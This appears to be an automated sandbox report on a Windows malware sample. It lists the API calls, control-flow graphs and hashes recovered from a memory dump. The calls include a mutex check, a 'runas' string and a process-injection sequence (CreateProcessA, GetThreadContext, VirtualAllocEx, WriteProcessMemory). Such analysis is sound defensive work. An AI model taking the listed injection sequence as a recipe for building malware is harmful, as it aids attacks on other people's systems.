                                                                • SetCurrentDirectoryA.KERNEL32(00000000,AA6E0749), ref: 002E8FA2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$Sleep$EnterLeave$ConditionCreateCurrentDirectoryInit_thread_footerThreadVariableWake___std_exception_copy
                                                                • String ID: runas
                                                                • API String ID: 91779485-4000483414
                                                                • Opcode ID: 0b4cb28305b8e9b7384c90c3a634d73c79f518caef325fb4b93b2ccaa961a437
                                                                • Instruction ID: bcf4ecfd779cceaf9fef123195ef4d62dfd01874767857951a4833d396ee0196
                                                                • Opcode Fuzzy Hash: 0b4cb28305b8e9b7384c90c3a634d73c79f518caef325fb4b93b2ccaa961a437
                                                                • Instruction Fuzzy Hash: 55225971621284AFDB09EF29DC5A79D7B66EF42304F90425CF4049F3C2DB759A908B91

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 002EC730: Sleep.KERNELBASE(00000096), ref: 002EC6D6
                                                                  • Part of subcall function 002EC730: CreateMutexA.KERNELBASE(00000000,00000000,00347494), ref: 002EC6F4
                                                                  • Part of subcall function 002EC730: GetLastError.KERNEL32 ref: 002EC6FC
                                                                  • Part of subcall function 002EC730: GetLastError.KERNEL32 ref: 002EC70D
                                                                  • Part of subcall function 002E61F0: RegOpenKeyExA.ADVAPI32(?,00000000), ref: 002E67BD
                                                                  • Part of subcall function 002E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 002E6894
                                                                • CreateThread.KERNEL32(00000000,00000000,00300F90,00000000,00000000,00000000), ref: 00301166
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00021020,00000000,00000000,00000000), ref: 00301177
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000210B0,00000000,00000000,00000000), ref: 00301188
                                                                • Sleep.KERNEL32(00007530), ref: 00301195
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Create$Thread$ErrorLastSleep$InfoMutexOpenQuery
                                                                • String ID:
                                                                • API String ID: 1072900782-0
                                                                • Opcode ID: 0077a0489091f13b7adae4dae6e5880f97fd531bfa8a9c6b92a97d6872ee7cb4
                                                                • Instruction ID: 952557ea793571e58f1b5ee128aaca5192def3dab468f6fb23bcd1758c977c2f
                                                                • Opcode Fuzzy Hash: 0077a0489091f13b7adae4dae6e5880f97fd531bfa8a9c6b92a97d6872ee7cb4
                                                                • Instruction Fuzzy Hash: 1FF0E531BE935876F13A33E50C17F9AA9084B08FD1F740122F7597E2C598C035605AAF

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 762 323e01-323e35 call 30ed09 call 30ecec 767 323e37-323e3a 762->767 768 323e3c-323e51 call 323e8f 762->768 769 323e5b-323e5f 767->769 771 323e56-323e59 768->771 772 323e61-323e69 call 3185a6 769->772 773 323e6a-323e6e 769->773 771->769 772->773
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: w1
                                                                • API String ID: 269201875-3583081367
                                                                • Opcode ID: 5bf193fee8e13bd601411da2ac5b93692fa8ed646d5c05a249e26dc7ca1745e2
                                                                • Instruction ID: 53bc4071c663c1f08dc093f5d49f470d77a454f4073c797a91ccd9fb639f2e8c
                                                                • Opcode Fuzzy Hash: 5bf193fee8e13bd601411da2ac5b93692fa8ed646d5c05a249e26dc7ca1745e2
                                                                • Instruction Fuzzy Hash: DD018F72C01159AFCF02AFA89C01AEE7FB5FF48300F154165F914E21A1E6318B64DB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 776 2f1dd0-2f1e6c call 2f1210 call 303730 call 2e61f0 783 2f21e7 call 2e26a0 776->783 784 2f1e72-2f1ed9 call 305d10 call 305b30 call 303670 776->784 787 2f21ec call 30f419 783->787 798 2f1edb-2f1eea 784->798 799 2f1f0a-2f1f17 784->799 791 2f21f1-2f2227 call 30ebb6 call 3036f0 call 303730 787->791 820 2f222b-2f223e call 3036f0 call 2e8700 791->820 801 2f1eec-2f1efa 798->801 802 2f1f00-2f1f07 call 30a429 798->802 803 2f1f19-2f1f28 799->803 804 2f1f48-2f1f55 799->804 801->787 801->802 802->799 805 2f1f3e-2f1f45 call 30a429 803->805 806 2f1f2a-2f1f38 803->806 807 2f1f57-2f1f66 804->807 808 2f1f86-2f1fb7 GetModuleFileNameA 804->808 805->804 806->787 806->805 812 2f1f7c-2f1f83 call 30a429 807->812 813 2f1f68-2f1f76 807->813 814 2f1fc1-2f1fc6 808->814 812->808 813->787 813->812 814->814 819 2f1fc8-2f202f call 304640 call 305fc0 814->819 830 2f2068-2f206f 819->830 831 2f2031-2f203c 819->831 829 2f2243 820->829 832 2f2246-2f2248 call 30e34e 829->832 836 2f2146-2f2149 830->836 837 2f2075-2f2091 call 30e5d0 830->837 833 2f203e-2f204c 831->833 834 2f2052-2f2062 call 30a429 831->834 838 2f224d-2f2252 call 30f419 832->838 833->834 833->838 834->830 839 2f214b-2f2156 836->839 840 2f2176-2f219a 836->840 837->791 854 2f2097-2f20a4 call 2e9ed0 837->854 844 2f216c-2f2173 call 30a429 839->844 845 2f2158-2f2166 839->845 847 2f219c-2f21ab 840->847 848 2f21cb-2f21e6 call 309db0 840->848 844->840 845->838 845->844 852 2f21ad-2f21bb 847->852 853 2f21c1-2f21c8 call 30a429 847->853 852->838 852->853 853->848 862 2f20ba-2f20c7 call 2e9ed0 854->862 863 2f20a6-2f20b4 call 3035a0 CreateDirectoryA 854->863 868 2f20fa-2f2100 call 2e9ea0 862->868 869 2f20c9-2f20f2 call 303730 call 2ea8c0 call 2f1080 862->869 863->862 873 2f2105-2f2107 868->873 881 2f20f7 869->881 873->832 875 2f210d-2f2141 call 3036f0 call 303730 873->875 875->820 881->868
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000,?,7FFFFFFF,?,?,0033DC20,00000001), ref: 002F1F94
                                                                • CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 002F20B4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectoryFileModuleName
                                                                • String ID:
                                                                • API String ID: 3341437400-0
                                                                • Opcode ID: 347855cbe8ca1d759de64aa1e6bc5c89d95c97fb054ff28b5df8e770a13fe007
                                                                • Instruction ID: 8b0ec8380cb817bfdcab4676ef63eec1c64a9489697407c07906406e425d03e6
                                                                • Opcode Fuzzy Hash: 347855cbe8ca1d759de64aa1e6bc5c89d95c97fb054ff28b5df8e770a13fe007
                                                                • Instruction Fuzzy Hash: 99C10371920258DBDF16EB24CC9A7EDBB79AF06300F8041D8E508AB2D2DB715B94CF91

                                                                Control-flow Graph

                                                                APIs
                                                                • GetUserNameA.ADVAPI32(?,?), ref: 002EE91D
                                                                • CoInitialize.OLE32(00000000), ref: 002EEC54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: InitializeNameUser
                                                                • String ID:
                                                                • API String ID: 2272643758-0
                                                                • Opcode ID: 20597399eb4634a6d46576138f11324327089e5c850c08ee8f1c0170cb227aa1
                                                                • Instruction ID: 598d0375aa525f46382cd9ba2fb1cfc44925e0380983f743e0bd9d0446a4a19e
                                                                • Opcode Fuzzy Hash: 20597399eb4634a6d46576138f11324327089e5c850c08ee8f1c0170cb227aa1
                                                                • Instruction Fuzzy Hash: 4BE12470A1526DDBEF20DF25C998BCEBBB5AF05308F5081D9E409A7281C7759A88CF91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 938 2f1080-2f117c call 305750 * 2 SHFileOperationA 945 2f11a6-2f11be 938->945 946 2f11e8-2f1203 call 309db0 945->946 947 2f11c0-2f11cc 945->947 948 2f11de-2f11e5 call 30a429 947->948 949 2f11ce-2f11dc 947->949 948->946 949->948 951 2f1204-2f1209 call 30f419 949->951
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 22531792f424969cc256ddd5d46b7f6d161b437f5ac50b9c4ae6c24781b492bd
                                                                • Instruction ID: 9c78e8e1d877c04db93ea42ba5d2c5822ed3375c410a8862b3d58c0279e217df
                                                                • Opcode Fuzzy Hash: 22531792f424969cc256ddd5d46b7f6d161b437f5ac50b9c4ae6c24781b492bd
                                                                • Instruction Fuzzy Hash: A431BF3161124CEFDB05CF68C985BEEBBB5FB48704F504229F905AB2C1D7B59990CB90

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 957 3177a2-3177c8 call 317578 960 317821-317824 957->960 961 3177ca-3177dc call 323e6f 957->961 963 3177e1-3177e6 961->963 963->960 964 3177e8-317820 963->964
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: __wsopen_s
                                                                • String ID:
                                                                • API String ID: 3347428461-0
                                                                • Opcode ID: baf9273f3ce57b6de155cd42d5114b6ed43218e24c72913c6c4809b9a202d775
                                                                • Instruction ID: 56d018a058602c94d3b239c7a9df4e102ede44f6d298f7b34f227a9d3304a29b
                                                                • Opcode Fuzzy Hash: baf9273f3ce57b6de155cd42d5114b6ed43218e24c72913c6c4809b9a202d775
                                                                • Instruction Fuzzy Hash: 04114575A0420AAFCF0ADF58E9419DB7BF8EF49304F154069F808AB251D630EA11CBA4

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 965 323b48-323b6c CreateFileW
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00323F38,?,?,00000000,?,00323F38,00000000,0000000C), ref: 00323B65
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: faf19986a710baa5ff8b9a553817a59153e64537329962dd15385f9df81d1b5a
                                                                • Instruction ID: b12603670aa53f748cc9d3bcb5a36f34dfcea166c0d6492c3cff637b07ffa64f
                                                                • Opcode Fuzzy Hash: faf19986a710baa5ff8b9a553817a59153e64537329962dd15385f9df81d1b5a
                                                                • Instruction Fuzzy Hash: 3CD06C3200010DBFDF028F84DD46EDA3FAAFB48714F014000BA1856020C732E821AB90

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 966 2e9ed0-2e9ed4 967 2e9ed8-2e9ee2 GetFileAttributesA 966->967 968 2e9ed6 966->968 969 2e9eeb-2e9eed 967->969 970 2e9ee4-2e9ee6 967->970 968->967 970->969 971 2e9ee8-2e9eea 970->971
                                                                APIs
                                                                • GetFileAttributesA.KERNELBASE(?,002F20A2,?,?,?,?), ref: 002E9ED9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 90dec5ea8fa75b89c4d963be594c508cc4dca413200b869c7f1c665fdf2ac8fb
                                                                • Instruction ID: f52840766c29e5df1ba4deba1a8f83f0f766042f508d30fa32601df3f68205b4
                                                                • Opcode Fuzzy Hash: 90dec5ea8fa75b89c4d963be594c508cc4dca413200b869c7f1c665fdf2ac8fb
                                                                • Instruction Fuzzy Hash: ABC0123006064056DE2CCE3A55481A53319A943395BEC068BD1324A0F5C3368897D750
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003097E3
                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003097F1
                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00309802
                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00309813
                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00309824
                                                                • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00309835
                                                                • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00309846
                                                                • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00309857
                                                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00309868
                                                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00309879
                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0030988A
                                                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0030989B
                                                                • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003098AC
                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003098BD
                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003098CE
                                                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003098DF
                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003098F0
                                                                • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00309901
                                                                • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00309912
                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00309923
                                                                • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00309934
                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00309945
                                                                • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00309956
                                                                • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00309967
                                                                • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00309978
                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00309989
                                                                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0030999A
                                                                • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 003099AB
                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003099BC
                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003099CD
                                                                • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 003099DE
                                                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 003099EF
                                                                • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00309A00
                                                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00309A11
                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00309A22
                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00309A33
                                                                • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00309A44
                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00309A55
                                                                • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00309A66
                                                                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00309A77
                                                                • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00309A88
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                • API String ID: 667068680-295688737
                                                                • Opcode ID: 1cb6e8acff7b7971aa5383ed67481d06cb56cf1930d1ca1b665b2519f18842ee
                                                                • Instruction ID: 1b11a8f5a4c9f9d6f4474b3a9182337566971918cd12ee20598c40a9cadee52f
                                                                • Opcode Fuzzy Hash: 1cb6e8acff7b7971aa5383ed67481d06cb56cf1930d1ca1b665b2519f18842ee
                                                                • Instruction Fuzzy Hash: 2861A775956360AFCB0B6FB5AD8EA9B3AACBA0B743F14441AF101D6164DFF460C08F54
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002E809D
                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 002E80FB
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 002E8114
                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 002E8129
                                                                • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 002E8149
                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 002E818B
                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 002E81A8
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002E8261
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                                                                • String ID: $VUUU$invalid stoi argument
                                                                • API String ID: 3796053839-3954507777
                                                                • Opcode ID: 863cc1b0e4a58bba263dc6b3938c8dbd4b105f3315c61443625ebd6f91d32bb2
                                                                • Instruction ID: 8233e7c112e86e6bc6d64e5f4d41c7a68c9e534bb6a80c07183434bda5018a48
                                                                • Opcode Fuzzy Hash: 863cc1b0e4a58bba263dc6b3938c8dbd4b105f3315c61443625ebd6f91d32bb2
                                                                • Instruction Fuzzy Hash: 95416071684341AFD7219F61DC46F96BBE8BF88701F400419FB88DA1E0DBB0A954CB96
                                                                APIs
                                                                  • Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
                                                                  • Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263
                                                                  • Part of subcall function 003171C0: _free.LIBCMT ref: 00317222
                                                                  • Part of subcall function 003171C0: _free.LIBCMT ref: 00317258
                                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00322F83
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00322FCC
                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00322FDB
                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00323023
                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00323042
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                • String ID: a3
                                                                • API String ID: 949163717-654815084
                                                                • Opcode ID: f57af26a4171f128d47f3d1efdddc38c71a06781bfeb4b7ee011791f783057e6
                                                                • Instruction ID: db0ee24645fcb514ce1de220e00579c44e5d98266ff97a41002073e84328db67
                                                                • Opcode Fuzzy Hash: f57af26a4171f128d47f3d1efdddc38c71a06781bfeb4b7ee011791f783057e6
                                                                • Instruction Fuzzy Hash: 1E517D71A00225BFDB12DFA5ED85AFBB7B8AF08700F050469F904EB191EB7099448B61
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: __floor_pentium4
                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                • API String ID: 4168288129-2761157908
                                                                • Opcode ID: 41c31ba5d011717553328a0b6c49cca6cf5d9e6f03c1e03fd2ac35917db2d8bd
                                                                • Instruction ID: ce16ad1ebd4207ba2db1f3fffff9b873f3229295ad742b29de01852b37fb8aa3
                                                                • Opcode Fuzzy Hash: 41c31ba5d011717553328a0b6c49cca6cf5d9e6f03c1e03fd2ac35917db2d8bd
                                                                • Instruction Fuzzy Hash: 24D22971E096288FDB66CE28ED407EAB7B9FB48305F1545EAD40DE7240E774AE818F41
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00322FC0,00000002,00000000,?,?,?,00322FC0,?,00000000), ref: 00322D3B
                                                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00322FC0,00000002,00000000,?,?,?,00322FC0,?,00000000), ref: 00322D64
